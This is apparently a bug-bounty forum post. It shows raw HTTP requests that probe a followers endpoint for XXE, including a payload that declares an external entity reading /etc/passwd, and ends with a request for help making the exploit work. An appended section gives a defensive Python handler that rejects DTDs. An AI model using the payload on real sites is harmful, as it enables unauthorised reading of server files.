I am a hacker, and right now I am looking for security vulnerabilities (bugs) for bounties. Yesterday, while hunting for bugs on a website, I saw a request like this:
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies
account_id=28605113
I was thinking of testing for XXE:
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example.com/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies
<?xml version="1.0" encoding="UTF-8"?>
<account_id>28605113</account_id>
Great! It works! I got followed by a new user using an XML body ====> XXE vulnerability
Then I decided to exploit it with this request:
POST /accounts/28605113/followers HTTP/1.1
Host: example.com
Connection: close
Content-Length: 19
Accept: */*
Origin: https://example.com
X-CSRF-Token: ch0+kD67DYFab7FmEeAn1RDh6DZUmI65S+K9CxuKTvg=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: text/xml; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://example.com/watch/search?q=hackerone
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: my_cookies
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><account_id>&xxe;</account_id>
But I only got a response like this:
HTTP/1.1 200 OK
Server: openresty
Content-Type: text/html; charset=utf-8
Strict-Transport-Security: max-age=31536000
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=Edge,chrome=1
ETag: "b326b5062b2f0e69046810717534cb09"
Set-Cookie: _example_session_id=7e9aa24785793d803b3917a45377b0cb; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT; HttpOnly
Set-Cookie: __cu_id=28945505; domain=.example.com; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
Set-Cookie: __cu_short_name=; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
Set-Cookie: __cu=%7B%22initial%22%3A%22%26%22%2C%22mixpanel_id%22%3A%2216e9cc289603ab-0a7935d33e069a-2393f61-15f900-16e9cc289614cb%22%2C%22created_at%22%3A1574588876%2C%22days_since_creation%22%3A0%2C%22plan_info%22%3A%7B%22id%22%3A-1%2C%22type%22%3A10%7D%2C%22features_with_plan%22%3A0%2C%22trial_info%22%3Anull%2C%22picture%22%3A%7B%22thumb_url%22%3Anull%7D%2C%22authorizationToken%22%3A%22b0128945505............................4bd802ced0b90c02e9c75e6284c87a32........................................1574588876164...........1574761676164...........YugborL0iXfMQ7sZDP2GWw%7E%7E00000000000000....................................%22%2C%22authorizationTokenExpiresAt%22%3A%222019-11-26T09%3A47%3A56.172Z%22%2C%22timezone%22%3A%22Asia%2FHo_Chi_Minh%22%7D; path=/; expires=Sun, 15-Dec-2019 13:01:05 GMT
X-Request-Id: 9439a64c3fcbe97f7c061c68f35b6f79
X-Runtime: 0.432708
Content-Length: 4
Date: Sun, 24 Nov 2019 13:01:05 GMT
Connection: close
X-Served-By: cache-jfk8121-JFK, cache-hkg17925-HKG
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1574600465.789233,VS0,VE681
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, private, must-revalidate, max-age=0, max-stale=0, post-check=0, pre-check=0
Expires: 0
Pragma: no-cache
Age: 0
Via: 1.1 varnish
Accept-Ranges: bytes
true
Nothing happened! The file I wanted to read did not show up. The only thing that came back seems to be just a "true" response. It looks like my XXE payload isn't working. I tried a lot, but it still doesn't work; nothing happens, just that simple response. Does any hacker know how to exploit this? Please help me, I would be very grateful! (Sorry if my English is bad)
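For the server side of the story: the endpoint above silently switched to an XML parser when the Content-Type changed, and that parser accepted a DOCTYPE with a SYSTEM entity. The example below is added here and is not code from the post or the site; it is a hardened handler for a `/followers` body that refuses any content type it was not designed for and, when it does parse XML, aborts on any DOCTYPE, entity declaration or external entity reference, so the `&xxe;` payload is rejected rather than expanded. It assumes (my assumption, not something the post states) that the API is meant to accept both form-encoded and XML bodies; the sample bodies are constructed to mirror the requests in the post.

```python
import xml.parsers.expat as expat
from urllib.parse import parse_qs

# Constructed bodies modelled on the requests in the post, not captured traffic.
FORM_BODY = "account_id=28605113"
XML_BODY = '<?xml version="1.0" encoding="UTF-8"?>\n<account_id>28605113</account_id>'
XXE_BODY = ('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe '
            'SYSTEM "file:///etc/passwd"> ]><account_id>&xxe;</account_id>')

class RejectedBody(ValueError):
    """Raised for any body the endpoint must refuse to process."""

def parse_xml_account_id(body: str) -> str:
    """Extract the <account_id> text with expat, refusing every DTD construct."""
    parser = expat.ParserCreate()
    parts, inside = [], [False]
    def forbid(*_):  # any DOCTYPE or entity declaration ends the parse
        raise RejectedBody("DTD and entity declarations are not allowed")
    parser.StartDoctypeDeclHandler = forbid
    parser.EntityDeclHandler = forbid
    # Defence in depth: returning 0 aborts the parse instead of fetching a SYSTEM entity.
    parser.ExternalEntityRefHandler = lambda *_: 0
    def start(name, _attrs):
        if name != "account_id":
            raise RejectedBody(f"unexpected element <{name}>")
        inside[0] = True
    parser.StartElementHandler = start
    parser.EndElementHandler = lambda _name: inside.__setitem__(0, False)
    parser.CharacterDataHandler = lambda data: parts.append(data) if inside[0] else None
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise RejectedBody(f"malformed XML: {exc}") from None
    return "".join(parts).strip()

def handle_followers_request(content_type: str, body: str):
    """Return ("ok", id) or ("rejected", reason). Assumes the API accepts form or XML bodies only."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    try:
        if media_type == "application/x-www-form-urlencoded":
            value = parse_qs(body, strict_parsing=True).get("account_id", [""])[0]
        elif media_type in ("text/xml", "application/xml"):
            value = parse_xml_account_id(body)
        else:
            raise RejectedBody(f"unsupported Content-Type {media_type!r}")
        if not value.isdigit():
            raise RejectedBody("account_id must be a decimal integer")
    except RejectedBody as exc:
        return ("rejected", str(exc))
    return ("ok", int(value))
```

A handler built this way answers the XXE request with an explicit rejection instead of the bare `true` seen above, which is also the signal a WAF or application log should carry for DOCTYPE-bearing bodies on an endpoint that only expects a numeric `account_id`.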